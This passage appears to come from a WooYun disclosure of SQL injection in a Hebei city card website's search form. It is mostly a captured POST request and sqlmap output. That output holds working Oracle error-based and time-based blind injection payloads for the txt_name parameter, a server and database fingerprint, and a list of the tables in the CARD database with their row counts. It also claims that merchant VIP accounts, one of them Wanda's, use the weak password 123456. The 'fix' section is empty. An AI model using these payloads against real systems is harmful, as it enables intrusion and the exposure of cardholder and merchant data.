IiIGJnY29sb3I9IiNFRkVGRUYiIGNsYXNzPSJmb250MDEiPjIzNjwvdGQ%2BPHRkIGFsaWduPSJsZWZ0IiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj48YSBocmVmPSIjIiBvbmNsaWNrPSJ0YW5jaHUoJ2RvdG1hcC5hc3B4P2RvdF9pZD0yMzYnKSIgIHN0eWxlPSJjb2xvcjojNjY2IiA%2BIOS4uuawkeWkp%2BiNr%2BaIvzwvYT48L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7nn7PlrrbluoTluILkuJzlubPot6%2FkuI7lubPlronljZflpKfooZfkuqTlj6PljZfooYwxNTDnsbPvvIjkvbPlhpzluILlnLrljJflj6PvvIk8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjRUZFRkVGIiBjbGFzcz0iZm9udDAxIj7moaXkuJzljLo8L3RkPjwvdHI%2BZAIVDw8WBB4IY291bnRTcWwFQVNlbGVjdCBDb3VudCgqKSBmcm9tIHBheWRvdCAgd2hlcmUgMT0xICBhbmQgKGNpdHlpZCBpbiAoJzEnLCcwJykpHgVxdWVyeQWWAVNFTEVDVCB4eC4qIEZST00oIHNlbGVjdCBwYXlkb3QuKixyb3dfbnVtYmVyKCkgb3ZlcihvcmRlciBieSBkb3RfaWQgZGVzYylBUyBudW0gRlJPTSBwYXlkb3QgIHdoZXJlIDE9MSAgYW5kIChjaXR5aWQgaW4gKCcxJywnMCcpKSAgb3JkZXIgYnkgZG90X2lkICl4eGQWDmYPDxYCHwEFAjkzZGQCAQ8PFgIfAQUBMWRkAgIPDxYCHwEFATVkZAIDDxYCHgdWaXNpYmxlaGQCBA8WAh8FaGQCBQ9kFhQCAQ8PFgQfAQUBMR4HRW5hYmxlZGhkZAIDDw8WAh8BBQEyZGQCBQ8PFgIfAQUBM2RkAgcPDxYCHwEFATRkZAIJDw8WAh8BBQE1ZGQCCw8PFgIfBWhkZAINDw8WAh8FaGRkAg8PDxYCHwVoZGQCEQ8PFgIfBWhkZAITDw8WAh8FaGRkAgYPFgIfBWhkAgUPZBYCAgEPFgIfAQWaBzxhIGhyZWY9Li4vbmV3c3Nob3cvVmlld0hlbHBfZ3VkaW5nLmFzcHg%2FaGVscHR5cGU9VzAwMSZoZWxwaWQ9MjMwJmxhYm5hbWU95pys56uZ5aOw5piOICB0YXJnZXQ9X3BhcmVudCBjbGFzcz0ibGluayI%2B5YWs5Y%2B4566A5LuLPC9hPiAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDs8YSBocmVmPS4uL25ld3NzaG93L1ZpZXdIZWxwX2d1ZGluZy5hc3B4P2hlbHB0eXBlPVcwMDEmaGVscGlkPTIzMSZsYWJuYW1lPeacrOermeWjsOaYjiAgdGFyZ2V0PV9wYXJlbnQgY2xhc3M9ImxpbmsiPuWVhuWKoeWQiOS9nDwvYT4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGEgaHJlZj0uLi9uZXdzc2hvdy9WaWV3SGVscF9ndWRpbmcuYXNweD9oZWxwdHlwZT1XMDAxJmhlbHBpZD0yMzImbGFibmFtZT3mnKznq5nlo7DmmI4gIHRhcmdldD1fcGFyZW50IGNsYXNzPSJsaW5rIj7lkIjkvZzkvJnkvLQ8L2E%2BICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxhIGhyZWY9Li4vbmV3c3Nob3cvVmlld0hlbHBfZ3VkaW5nLmFzcHg%2FaGVscHR5cGU9VzAwMSZoZWxwaWQ9MjMzJmxhYm5hbWU95pys56uZ5aOw5piOICB0YXJnZXQ9X3BhcmVudCBjbGFzcz0ibGluayI%2B5Lq65omN5oub6IGYPC9hPiAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDs8YSBocmVmPS4uL25ld3NzaG93L1ZpZXdIZWxwX2d1ZGluZy5hc3B4P2hlbHB0eXBlPVcwMDEmaGVscGlkPTIzNCZsYWJuYW1lPeacrOermeWjsOaYjiAgdGFyZ2V0PV9wYXJlbnQgY2xhc3M9ImxpbmsiPuiBlOezu%2BaIkeS7rDwvYT4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGEgaHJlZj0nL3FxdGMvSGVCZWlDaXR5Q2FyZC5hcGsnICB0YXJnZXQ9X3BhcmVudCBjbGFzcz0ibGluayI%2B5LiL6L29QVBQPC9hPiAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtkZC4DdrLMmT4trvXZ16%2F8zQnKO%2B3Uv%2Bw7UqRrpvm7EtkE&__EVENTVALIDATION=%2FwEWCQLm2P%2FrCQL%2F4uenAwLizbHrCwK0w9STDQKVnPPnAgLljIE1AuWMvcYKAuWMqesBAuWM5fwLIx7UGZM3XDYn4QnhUNUCyHR05oBoCzf57yGi9K7rNhM%3D&ctl00%24ContentPlaceHolder1%24txt_name=1&ctl00%24ContentPlaceHolder1%24txt_adress=2&ctl00%24ContentPlaceHolder1%24txt_area=3&ctl00%24ContentPlaceHolder1%24bt_chaxun=%B2%E9%D1%AF


查看泄露信息量:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ctl00$ContentPlaceHolder1$txt_name (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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ICBhbmQgYWRkcmVzcyBsaWtlICclMiUnICBhbmQgYm91bmRuYW1lIGxpa2UgJyUzJScgIG9yZGVyIGJ5IGRvdF9pZCApeHgeB1Zpc2libGVoZBYOZg8PFgIfAQUCOTNkZAIBDw8WAh8BBQExZGQCAg8PFgIfAQUBNWRkAgMPFgIfBWhkAgQPFgIfBWhkAgUPZBYUAgEPDxYEHwEFATEeB0VuYWJsZWRoZGQCAw8PFgIfAQUBMmRkAgUPDxYCHwEFATNkZAIHDw8WAh8BBQE0ZGQCCQ8PFgIfAQUBNWRkAgsPDxYCHwVoZGQCDQ8PFgIfBWhkZAIPDw8WAh8FaGRkAhEPDxYCHwVoZGQCEw8PFgIfBWhkZAIGDxYCHwVoZAIFD2QWAgIBDxYCHwEFmgc8YSBocmVmPS4uL25ld3NzaG93L1ZpZXdIZWxwX2d1ZGluZy5hc3B4P2hlbHB0eXBlPVcwMDEmaGVscGlkPTIzMCZsYWJuYW1lPeacrOermeWjsOaYjiAgdGFyZ2V0PV9wYXJlbnQgY2xhc3M9ImxpbmsiPuWFrOWPuOeugOS7izwvYT4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGEgaHJlZj0uLi9uZXdzc2hvdy9WaWV3SGVscF9ndWRpbmcuYXNweD9oZWxwdHlwZT1XMDAxJmhlbHBpZD0yMzEmbGFibmFtZT3mnKznq5nlo7DmmI4gIHRhcmdldD1fcGFyZW50IGNsYXNzPSJsaW5rIj7llYbliqHlkIjkvZw8L2E+ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxhIGhyZWY9Li4vbmV3c3Nob3cvVmlld0hlbHBfZ3VkaW5nLmFzcHg/aGVscHR5cGU9VzAwMSZoZWxwaWQ9MjMyJmxhYm5hbWU95pys56uZ5aOw5piOICB0YXJnZXQ9X3BhcmVudCBjbGFzcz0ibGluayI+5ZCI5L2c5LyZ5Ly0PC9hPiAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDs8YSBocmVmPS4uL25ld3NzaG93L1ZpZXdIZWxwX2d1ZGluZy5hc3B4P2hlbHB0eXBlPVcwMDEmaGVscGlkPTIzMyZsYWJuYW1lPeacrOermeWjsOaYjiAgdGFyZ2V0PV9wYXJlbnQgY2xhc3M9ImxpbmsiPuS6uuaJjeaLm+iBmDwvYT4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGEgaHJlZj0uLi9uZXdzc2hvdy9WaWV3SGVscF9ndWRpbmcuYXNweD9oZWxwdHlwZT1XMDAxJmhlbHBpZD0yMzQmbGFibmFtZT3mnKznq5nlo7DmmI4gIHRhcmdldD1fcGFyZW50IGNsYXNzPSJsaW5rIj7ogZTns7vmiJHku6w8L2E+ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxhIGhyZWY9Jy9xcXRjL0hlQmVpQ2l0eUNhcmQuYXBrJyAgdGFyZ2V0PV9wYXJlbnQgY2xhc3M9ImxpbmsiPuS4i+i9vUFQUDwvYT4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ZGQ5+vClypbgT4BD8uJkevkQfpLC7StAEANuBhZt5NDNlg==&__EVENTVALIDATION=/wEWBQKEktneAQL/4uenAwLizbHrCwK0w9STDQKVnPPnAld34uL4VAI+/JLJgDuux2SplyfucOHNzc1z48wEnppK&ctl00$ContentPlaceHolder1$txt_name=1%' AND 8830=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(113)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8830=8830) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='&ctl00$ContentPlaceHolder1$txt_adress=2&ctl00$ContentPlaceHolder1$txt_area=3&ctl00$ContentPlaceHolder1$bt_chaxun=%B2%E9%D1%AF
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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ICBhbmQgYWRkcmVzcyBsaWtlICclMiUnICBhbmQgYm91bmRuYW1lIGxpa2UgJyUzJScgIG9yZGVyIGJ5IGRvdF9pZCApeHgeB1Zpc2libGVoZBYOZg8PFgIfAQUCOTNkZAIBDw8WAh8BBQExZGQCAg8PFgIfAQUBNWRkAgMPFgIfBWhkAgQPFgIfBWhkAgUPZBYUAgEPDxYEHwEFATEeB0VuYWJsZWRoZGQCAw8PFgIfAQUBMmRkAgUPDxYCHwEFATNkZAIHDw8WAh8BBQE0ZGQCCQ8PFgIfAQUBNWRkAgsPDxYCHwVoZGQCDQ8PFgIfBWhkZAIPDw8WAh8FaGRkAhEPDxYCHwVoZGQCEw8PFgIfBWhkZAIGDxYCHwVoZAIFD2QWAgIBDxYCHwEFmgc8YSBocmVmPS4uL25ld3NzaG93L1ZpZXdIZWxwX2d1ZGluZy5hc3B4P2hlbHB0eXBlPVcwMDEmaGVscGlkPTIzMCZsYWJuYW1lPeacrOermeWjsOaYjiAgdGFyZ2V0PV9wYXJlbnQgY2xhc3M9ImxpbmsiPuWFrOWPuOeugOS7izwvYT4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGEgaHJlZj0uLi9uZXdzc2hvdy9WaWV3SGVscF9ndWRpbmcuYXNweD9oZWxwdHlwZT1XMDAxJmhlbHBpZD0yMzEmbGFibmFtZT3mnKznq5nlo7DmmI4gIHRhcmdldD1fcGFyZW50IGNsYXNzPSJsaW5rIj7llYbliqHlkIjkvZw8L2E+ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxhIGhyZWY9Li4vbmV3c3Nob3cvVmlld0hlbHBfZ3VkaW5nLmFzcHg/aGVscHR5cGU9VzAwMSZoZWxwaWQ9MjMyJmxhYm5hbWU95pys56uZ5aOw5piOICB0YXJnZXQ9X3BhcmVudCBjbGFzcz0ibGluayI+5ZCI5L2c5LyZ5Ly0PC9hPiAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDs8YSBocmVmPS4uL25ld3NzaG93L1ZpZXdIZWxwX2d1ZGluZy5hc3B4P2hlbHB0eXBlPVcwMDEmaGVscGlkPTIzMyZsYWJuYW1lPeacrOermeWjsOaYjiAgdGFyZ2V0PV9wYXJlbnQgY2xhc3M9ImxpbmsiPuS6uuaJjeaLm+iBmDwvYT4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGEgaHJlZj0uLi9uZXdzc2hvdy9WaWV3SGVscF9ndWRpbmcuYXNweD9oZWxwdHlwZT1XMDAxJmhlbHBpZD0yMzQmbGFibmFtZT3mnKznq5nlo7DmmI4gIHRhcmdldD1fcGFyZW50IGNsYXNzPSJsaW5rIj7ogZTns7vmiJHku6w8L2E+ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxhIGhyZWY9Jy9xcXRjL0hlQmVpQ2l0eUNhcmQuYXBrJyAgdGFyZ2V0PV9wYXJlbnQgY2xhc3M9ImxpbmsiPuS4i+i9vUFQUDwvYT4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ZGQ5+vClypbgT4BD8uJkevkQfpLC7StAEANuBhZt5NDNlg==&__EVENTVALIDATION=/wEWBQKEktneAQL/4uenAwLizbHrCwK0w9STDQKVnPPnAld34uL4VAI+/JLJgDuux2SplyfucOHNzc1z48wEnppK&ctl00$ContentPlaceHolder1$txt_name=1%' AND 6855=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(106)||CHR(75)||CHR(79),5) AND '%'='&ctl00$ContentPlaceHolder1$txt_adress=2&ctl00$ContentPlaceHolder1$txt_area=3&ctl00$ContentPlaceHolder1$bt_chaxun=%B2%E9%D1%AF
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
Database: CARD
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| WEBSERVICE_LOG       | 144567  |
| SMSHISTORY           | 39560   |
| CCBCARD              | 17474   |
| YKT_CZ_RECORD        | 15731   |
| VAR_LOG              | 8754    |
| WEBNOTIFY_LOG        | 7208    |
| CARD_HOLDER          | 4920    |
| CARD_LIST            | 3648    |
| DOT_IMGLIST          | 1118    |
| CONSUME_DOT          | 1034    |
| BUSINESS_TRADETYPE   | 995     |
| BUSINESS             | 942     |
| HOT_BUSINESS         | 481     |
| DOT_TRADEBOUND       | 350     |
| HUODONG1             | 283     |
| VAR_ROLECONFIG       | 246     |
| TRADE_ORDER          | 212     |
| DAKEHUGOUKA          | 211     |
| XIANQU               | 180     |
| VIP_USERDEPT         | 148     |
| VIP_USER             | 143     |
| VIP_USER_RELATION    | 140     |
| PAYDOT               | 128     |
| SYSTEM_MSG           | 123     |
| CARD_MEMORY_ETC_USER | 105     |
| CARD_MEMORY_LY       | 104     |
| VAR_PERSONNELRULE    | 103     |
| VAR_MENU             | 87      |
| SYSTEM_HELP          | 77      |
| CARD_MEMORY_LY_USER  | 63      |
| PWD_QUESTION         | 59      |
| USER_BUSINESS        | 53      |
| PRODUCT_LIST         | 50      |
| BIGDISCOUNT          | 48      |
| TRADE_BOUND          | 48      |
| CARD_MEMORY_TK_USER  | 43      |
| CARD_MEMORY_ETC      | 41      |
| FRIENDS              | 38      |
| TRADE_TYPE           | 33      |
| CHANGEIMG            | 32      |
| VAR_PERSONNELINFO    | 30      |
| SIGN                 | 26      |
| SYSTEM_LINKS         | 24      |
| CARD_MEMORY_TK       | 20      |
| COMMENTS             | 17      |
| USER_VOUCHER         | 17      |
| HELP_TYPE            | 14      |
| BRANCH               | 13      |
| VAR_ROLE             | 13      |
| CARD_MEMORY_TK2      | 12      |
| VAR_DEPT             | 12      |
| CARD_MEMORY_TK_USER2 | 11      |
| CITY                 | 11      |
| PRODUCT_TYPE         | 11      |
| APPLY_INFO           | 8       |
| CUSTOMERHISTORY      | 6       |
| IMAGELH              | 6       |
| CARDLOG              | 4       |
| CARDTYPE             | 4       |
| ERROR                | 4       |
| LATESTACT            | 4       |
| PARVALUE             | 4       |
| SCOREADV             | 4       |
| VIP_RELATION_MAP     | 4       |
| MSG_TYPE             | 3       |
| ZHIFUCFG             | 3       |
| ACTIVITY_INFO        | 2       |
| SYSTEM_AD            | 2       |
| BASEINFO             | 1       |
| BLACKLIST            | 1       |
| CHOUJIANG            | 1       |
| FOBBIDENCARDSECTIONS | 1       |
| NEWCCBCARD           | 1       |
| SEO                  | 1       |
| SYSTEM_VOTECFG       | 1       |
| USER_IDENTITY_PHOTO  | 1       |
| VOUCHER              | 1       |
+----------------------+---------+


泄露多个VIP合作商户的账户,万达也在这里,又现123456弱口令

w.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝